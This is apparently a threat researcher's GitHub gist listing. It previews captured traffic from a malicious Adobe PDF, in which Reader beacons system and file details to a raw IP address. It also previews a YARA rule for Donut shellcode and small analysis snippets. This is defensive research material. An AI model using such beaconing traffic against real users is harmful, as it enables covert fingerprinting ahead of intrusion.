Skip to content

Instantly share code, notes, and snippets.

@g-les
g-les / Traffic.txt
Created April 8, 2026 19:18
Adobe Exploit PDF Traffic
GET /s11?language=ENU&viewerType=Reader&viewerVersion=23.00820533&platform=WIN&activeDocs=1&errs=&av=NONE&osVersion=10.0.19041.1288&pdfFile=C:%5CUsers%5CBruno%5CDesktop%5Cattachment.pdf&rnd=0.6363903904530459&od=319988 HTTP/1.1
Accept: */*
User-Agent: Mozilla/3.0 (compatible; Adobe Synchronizer 23.8.20533)
Host: 169.40.2.68:45191
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Mar 2026 12:07:36 GMT
@g-les
g-les / next_data.py
Created May 10, 2023 13:29
Binja Snippet to Jump Around Data
bv.navigate(bv.view, bv.get_next_data_var_start_after(here))
@g-les
g-les / donut_shellcode_fixed.yar
Created February 9, 2022 21:53
Telsy's Awesome Donut Shellcode YARA Rule
rule donut_shellcode_fixed
{
meta:
description = "Tested against shellcodes x86/x64 generated by Donut v0.9.3"
author = "Telsy CTI team"
date = "18/11/2021"
condition:
uint8(0) == 0xe8 and // shellcode starts with a call
uint32(1) == uint32(5) and
// xor generator key and xor initial key cannot be null it is 32 bytes

Keybase proof

I hereby claim:

  • I am g-les on github.
  • I am glesnewich (https://keybase.io/glesnewich) on keybase.
  • I have a public key ASC1pkCbjKDRmT41uYt-kT0-3i4YkwNvWM5PUPNx__axaQo

To claim this, I am signing this object:

@g-les
g-les / 100_days_of_yara.yar
Last active September 26, 2022 01:01
100 Days of YARA to be updated with rules & ideas as the year progresses
/*
Goals for #100DaysofYARA:
better understanding of bitwise operators
use math module beyond general entropy of a section / resource
position specific things beyond what PE module tells us
do some funky stuff with hashing
*/